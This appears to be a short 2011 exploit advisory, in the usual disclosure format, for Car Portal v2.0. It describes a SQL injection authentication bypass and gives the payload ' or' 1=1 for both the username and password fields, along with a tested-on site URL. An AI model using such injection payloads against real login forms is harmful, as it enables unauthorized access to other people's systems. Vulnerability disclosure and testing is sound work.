Car Portal version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass. This is the same vulnerability that affected version 1.0.
b81d1ba1dfa5f5b4abef4f68cf9938f66968aba574bf0980b51df453711c74a0
# Exploit Title: Car Portal (Auth Bypass) SQL injection Valunrability
# Google Dork: n/a
# Date: 18.09.2011
#Author: m3rciL3Ss
# Software Link:http://www.netartmedia.net/carsportal/
#Version:v2.0
# Tested on:http://www.wscreator.com/autoportal1/
m3rciL3Ss@w.cn
################################
Exploit:
Username: 'or' 1=1
Password: 'or' 1=1
################################
Thanks :TuBiGu and Bgh7
################################
Sizlér Tanrýlanýzýn Düþlérisiniz...
Bénsé Délirmiþ Bir Tanrýnýn Halüsinasyonlarýyým.
################################